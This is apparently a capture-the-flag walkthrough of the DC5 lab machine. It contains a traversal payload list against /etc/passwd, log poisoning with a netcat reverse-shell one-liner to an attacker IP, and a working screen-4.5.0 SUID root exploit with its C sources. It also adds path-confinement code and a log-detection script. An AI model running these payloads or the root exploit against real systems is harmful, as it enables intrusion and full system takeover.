# DC5

## Nmap

```
sudo nmap 192.168.184.26 -p- -sS -sV

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
111/tcp   open  rpcbind 2-4 (RPC #100000)
38106/tcp open  status  1 (RPC #100024)
```

Port 80 on the target machine takes us to the following web page. Multiple sub-pages include non-English text, and after translating random paragraphs I found it to be mostly gibberish.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-85f3e45925e362011e339cfd90339d069e68bdbe%2Fimage.png?alt=media)

Clicking the home button takes us to the same page but we notice this time we are on /index.php. I then ran feroxbuster against the target site to identify more pages.

```
feroxbuster --url http://192.168.184.26 -w /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt -s 200,300,301 -x php
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ec7feb5eee42f7a988bece0cc2a62ff8f174e057%2Fimage.png?alt=media)

Checking out contact.php, it appears to be the only page that takes some form of input.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f6a3eb3f7e5acdcacf25b08fc808416a6b4cb54d%2Fimage.png?alt=media)

After submitting some test information we are directed to /thankyou.php where the URL contains our input from the previous page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-518f70bf5ef32af5597e92de8c5aaa1e5296cf95%2Fimage.png?alt=media)

At this point I decided to test thankyou.php for command injection. I caught the request in `Burpsuite` and sent it to Intruder. I then set the payload position as shown below.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6f24f5410d4908994ee32ad150b96891509c0837%2Fimage.png?alt=media)

I then added the command injection list shown below as the payload.

```
?cmd=../../../../../etc/passwd
?exec=../../../../../etc/passwd
?command=../../../../../etc/passwd
?execute=../../../../../etc/passwd
?ping=../../../../../etc/passwd
?query=../../../../../etc/passwd
?jump=../../../../../etc/passwd
?code=../../../../../etc/passwd
?reg=../../../../../etc/passwd
?do=../../../../../etc/passwd
?func=../../../../../etc/passwd
?arg=../../../../../etc/passwd
?option=../../../../../etc/passwd
?load=../../../../../etc/passwd
?process=../../../../../etc/passwd
?step=../../../../../etc/passwd
?read=../../../../../etc/passwd
?function=../../../../../etc/passwd
?req=../../../../../etc/passwd
?feature=../../../../../etc/passwd
?exe=../../../../../etc/passwd
?module=../../../../../etc/passwd
?payload=../../../../../etc/passwd
?run=../../../../../etc/passwd
?print=../../../../../etc/passwd
?file=../../../../../etc/passwd
```

Ensure URL encoding is turned off, as it was causing incorrect results by encoding the `?` character.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-93f615de1f531fa6eadef7e20977a26209912624%2Fimage.png?alt=media)

Viewing the results of the attack shows that the `?file=` parameter appears to be vulnerable, as its response content length differs greatly from that of the other values.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9bb117507aedf42c64e8cbbfe748933bc47b8c81%2Fimage.png?alt=media)

Viewing this in the browser shows us valid results.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b8b919ba6e3b1658369369416d4d14b24e838e3f%2Fimage.png?alt=media)
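The `?file=` parameter is vulnerable because the value is handed to an include without being confined to the web root, so `../` segments walk out of it. The following Python script is an added example, not code from this write-up or from the DC5 machine: it mirrors the unchecked pattern, then shows the two defensive controls that stop it (canonicalise and confine to the document root, or better, use the parameter only as a key into an allowlist). `WEB_ROOT` and the allowlist entries are constructed for the example; the real document root on the box is not known from the page.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Constructed document root; the real location of thankyou.php on the target is an assumption.
WEB_ROOT = "/var/www/html"

# Pages the application legitimately includes (constructed allowlist using the page names
# seen during enumeration). The user-controlled value only ever selects a key.
ALLOWED_PAGES = {
    "index": "index.php",
    "contact": "contact.php",
}


def unsafe_include_path(file_param: str) -> str:
    """Mirror of the vulnerable pattern: the parameter is joined to the web root with no
    validation, so '../' segments escape it. normpath shows where the include really lands."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, file_param))


def safe_include_path(file_param: str, root: str = WEB_ROOT) -> Optional[str]:
    """Return an absolute path confined to `root`, or None when the value must be rejected."""
    # Decode once so %2e%2e%2f is judged as '../'. Anything still carrying '%' afterwards
    # (double encoding) or a NUL byte (historic path truncation trick) is rejected outright.
    decoded = unquote(file_param)
    if "%" in decoded or "\x00" in decoded:
        return None
    # Absolute values would replace the root entirely when joined.
    if posixpath.isabs(decoded):
        return None
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    # Once traversal escapes the root, the common prefix collapses to an ancestor ('/' here).
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


def resolve_page(page_key: str) -> Optional[str]:
    """Allowlist lookup: no path reasoning is needed because the input never becomes a path."""
    name = ALLOWED_PAGES.get(page_key)
    return posixpath.join(WEB_ROOT, name) if name else None


if __name__ == "__main__":
    payload = "../../../../../etc/passwd"
    print("unchecked include resolves to:", unsafe_include_path(payload))
    print("confined include resolves to :", safe_include_path(payload))
    print("allowlist lookup for 'contact':", resolve_page("contact"))
```

The confinement check is the minimum fix for code that must keep accepting a path; the allowlist is the preferable design for a page that only ever includes a handful of known templates, because it removes the traversal surface rather than filtering it.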

We can fuzz for further files using `wfuzz` and the command below:

```
wfuzz -c -w lfi.txt --hl 42 http://192.168.184.26/thankyou.php?file=../../../../../../../FUZZ
```

The LFI list can be downloaded from here:

{% file src="<https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8f0bbe6ec0f91f0aaced8b7fff9d7dc6ddbbb34f%2Flfi.txt?alt=media>" %}
LFI list
{% endfile %}

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ed25c99e1405ebff3d05c74d5dd4237840be3199%2Fimage.png?alt=media)

Once `wfuzz` completes, we have two interesting LFI paths:

```
/var/log/nginx/access.log
/var/log/nginx/error.log
```

Checking out access.log, we can see the requests we have made.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-73c9ef8bac975112ad8724fd5bd700afe3663e31%2Fimage.png?alt=media)

We can capture a request in `Burpsuite` and inject a PHP reverse shell into the User-Agent field. When the code is injected into the log we are able to get a reverse shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4862f5013379a2919d5644ceff5cd6ca76a1861a%2Fimage.png?alt=media)

The code snippet below is used for the RCE:

```
<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.211 80 >/tmp/f') ?>
```

With a netcat listener listening we can then access the log files again at: <http://192.168.211.26/thankyou.php?file=../../../../../../../var/log/nginx/access.log>

When we attempt to load the log file, the page should hang and we get a reverse shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-23f6d546c2734b08f0155ffcda191eae5f6b45fb%2Fimage.png?alt=media)
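Everything in the chain above leaves a trace in the same access log that was abused: traversal sequences in the `file` parameter, reads of `/etc/passwd`, the log file being included through the page, and PHP tags arriving in the User-Agent header. The script below is an added example for the defending side, not code from this write-up: it parses nginx combined-format lines, decodes the query (including double encoding) and flags each of those indicators. The log lines it runs on are constructed to resemble the activity described above; the timestamps, referers and the harmless `<?php echo ... ?>` marker are made up for the example.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# nginx "combined" format, which a stock /var/log/nginx/access.log uses.
# The regex assumes no embedded double quotes inside the quoted fields.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

TRAVERSAL_RE = re.compile(r'(^|[/\\])\.\.([/\\]|$)')      # '..' as a path segment
SENSITIVE_RE = re.compile(r'/etc/(passwd|shadow)|/proc/self')
LOG_PATH_RE = re.compile(r'/var/log/')                     # log file pulled through the page
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)     # PHP code in a logged header

# Constructed sample log: one benign form submission, three traversal reads of
# /etc/passwd (plain, URL-encoded, double-encoded), the log self-include with a
# PHP tag in the User-Agent, and one benign request.
SAMPLE_LOG = [
    '192.168.49.211 - - [10/Mar/2021:14:02:11 +0000] "GET /thankyou.php?firstname=a&lastname=b HTTP/1.1" 200 1021 "http://192.168.184.26/contact.php" "Mozilla/5.0"',
    '192.168.49.211 - - [10/Mar/2021:14:05:37 +0000] "GET /thankyou.php?file=../../../../../etc/passwd HTTP/1.1" 200 2344 "-" "Mozilla/5.0"',
    '192.168.49.211 - - [10/Mar/2021:14:06:02 +0000] "GET /thankyou.php?file=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 2344 "-" "Mozilla/5.0"',
    '192.168.49.211 - - [10/Mar/2021:14:07:19 +0000] "GET /thankyou.php?file=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 2344 "-" "Mozilla/5.0"',
    '192.168.49.211 - - [10/Mar/2021:14:09:50 +0000] "GET /thankyou.php?file=../../../../../../../var/log/nginx/access.log HTTP/1.1" 200 98712 "-" "<?php echo \'poisoned\'; ?>"',
    '192.168.49.211 - - [10/Mar/2021:14:10:01 +0000] "GET /index.php HTTP/1.1" 200 1890 "-" "Mozilla/5.0"',
]


def query_values(target):
    """Yield each query-string value, decoded a second time so double encoding is seen too."""
    raw = urlsplit(target).query
    for _key, value in parse_qsl(raw, keep_blank_values=True):  # parse_qsl decodes once
        yield unquote(value)


def analyze_line(line):
    """Return the list of rule names that fire on one log line ([] if clean, None if unparsable)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    f = m.groupdict()
    rules = []
    values = list(query_values(f["target"]))
    if any(TRAVERSAL_RE.search(v) for v in values):
        rules.append("traversal")
    if any(SENSITIVE_RE.search(v) for v in values):
        rules.append("sensitive-file")
    if any(LOG_PATH_RE.search(v) for v in values):
        rules.append("log-include")
    if PHP_TAG_RE.search(unquote(f["ua"])) or PHP_TAG_RE.search(unquote(f["referer"])):
        rules.append("php-in-header")
    return rules


def analyze(lines):
    """Return findings as dicts {line, ip, target, rules} for every line that triggers a rule."""
    findings = []
    for number, line in enumerate(lines, start=1):
        rules = analyze_line(line)
        if rules:
            m = LOG_RE.match(line)
            findings.append({"line": number, "ip": m.group("ip"),
                             "target": m.group("target"), "rules": rules})
    return findings


if __name__ == "__main__":
    for hit in analyze(SAMPLE_LOG):
        print(f"line {hit['line']:>3} {hit['ip']:<16} {','.join(hit['rules']):<40} {hit['target']}")
```

The `log-include` and `php-in-header` rules together are the signature of log poisoning: either alone can be noise (a scanner probing log paths, a broken client sending odd headers), but a PHP tag logged shortly before the log is pulled through the vulnerable include is the sequence that yields code execution.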

Searching for SUID binaries on the machine finds that screen-4.5.0 has the SUID bit set.

```
find / -perm -u=s -type f 2>/dev/null
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a0b823061132a89179e61e4882526a68c4c0a233%2Fimage.png?alt=media)

Researching on Google shows a local privilege escalation exploit for this binary version.

{% embed url="<https://github.com/XiphosResearch/exploits/tree/master/screen2root>" %}

We first need to create some files and break the script down into steps to get this to work. Follow the instructions below to achieve a root shell.

{% tabs %}
{% tab title="libhax.c" %}

```
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>   /* chmod */
#include <unistd.h>     /* chown, unlink */

/* Constructor: runs automatically when this library is loaded through
   /etc/ld.so.preload, i.e. inside the SUID-root screen process. */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);       /* make the helper binary root-owned */
    chmod("/tmp/rootshell", 04755);      /* and SUID root */
    unlink("/etc/ld.so.preload");        /* remove the preload entry again */
    printf("[+] done!\n");
}
```

{% endtab %}
{% endtabs %}

**Compile libhax.c**

`gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c`

{% tabs %}
{% tab title="rootshell.c" %}

```
#include <stdio.h>
#include <unistd.h>     /* setuid, setgid, seteuid, setegid, execl */

/* Only succeeds in dropping to uid 0 once libhax.so has made this binary SUID root. */
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    /* execvp() takes two arguments; execl with a NULL-terminated argument list is the correct call */
    execl("/bin/sh", "sh", (char *)NULL);
    return 1;   /* only reached if exec fails */
}
```

{% endtab %}
{% endtabs %}

**Compile rootshell.c**

`gcc -o /tmp/rootshell /tmp/rootshell.c`

Create the exploit bash script.

{% tabs %}
{% tab title="exploit.sh" %}

```
#!/bin/bash

cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
echo "[+] Triggering..."
screen -ls
```

{% endtab %}
{% endtabs %}

Transfer the compiled files and the script to the target machine (served from the attacking host):

```
wget http://192.168.49.211/rootshell
wget http://192.168.49.211/libhax.so
wget http://192.168.49.211/exploit.sh
```

Once transferred, make the bash script executable:

```
chmod +x exploit.sh
```

Execute exploit.sh, then run `/tmp/rootshell` to gain a shell as root.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-02230c51a3b5ea63c8d0f48f78ff675373b23a13%2Fimage.png?alt=media)
